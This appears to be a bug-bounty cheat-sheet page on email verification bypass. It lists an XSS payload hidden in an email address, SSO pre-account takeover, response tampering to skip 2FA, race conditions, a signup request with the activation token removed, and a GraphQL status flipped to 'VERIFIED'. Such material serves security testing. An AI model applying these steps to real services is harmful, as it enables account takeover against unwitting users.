Email Verification Bypass

Email injections

"><svg/onload=confirm(1)>"@x.y

How I Discovered an Email Verification BypassMedium

No email verification + SSO = Pre Account Takeover

First manually creating an account using the target's email address.

Later if the target goes to create an account or login using SSO they will be linked to the same account.

You will be able to access the target account via the credentials you set up earlier .

Alter response

Register an account - Login with this account and intercept the success login response
Register a victim account - it will prompt to a 2FA code but we don't have access to that email
Go back to login with the email
Capture the login request - Alter the response to success response

Race Condition

Intercept change email request and send it to repeater

Send the request at least 2 times so send it to the repeater again

Repeater 1

Repeater 2

Create group to be able to send the two requests in the same time

Send group in parallel

Email verification bypass due to race condition.Medium

Remove the Token

Modify the email parameter from attacker@gmail.com to a different email address (for this example, victim@gmail.com)

https://app.example.me/signup/activation?token=c6dc625e-5b5a-4627-b39c-98e0dfcbc22f&source=trial&email=victim@gmail.com&chkNR=false

Intercept the request

{
  "firstName": "Attacker",
  "lastName": "Smith",
  "email": "victim@gmail.com",
  "password": "strongpassword123",
  "token": "c6dc625e-5b5a-4627-b39c-98e0dfcbc22f"
}

Remove the token

{
  "firstName": "Attacker",
  "lastName": "Smith",
  "email": "victim@gmail.com",
  "password": "strongpassword123",
}

How I Discovered an Email Verification BypassMedium

GraphQL Request

[{"operationName":"solutionsResendEmailVerification","variables":{"input":{"entityId":"511","status":"PENDING","requestReferrer":"SOLUTIONS_CREATE"}},"query":"mutation solutionsResendEmailVerification($input: ResendEmailInput!) {\n resendEmailVerification(input: $input) {\n success\n __typename\n }\n}\n"}]

Change STATUS to “VERIFIED,” refresh the page, and gain access to the solutions without verifying the address

1200 $ Email verification Bypass from P4 TO P2Medium

Broken Authentication

Broken Authentication To Email Verification Bypass (P4)Medium

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousRegistration Form NextEmail injections

Last updated 1 month ago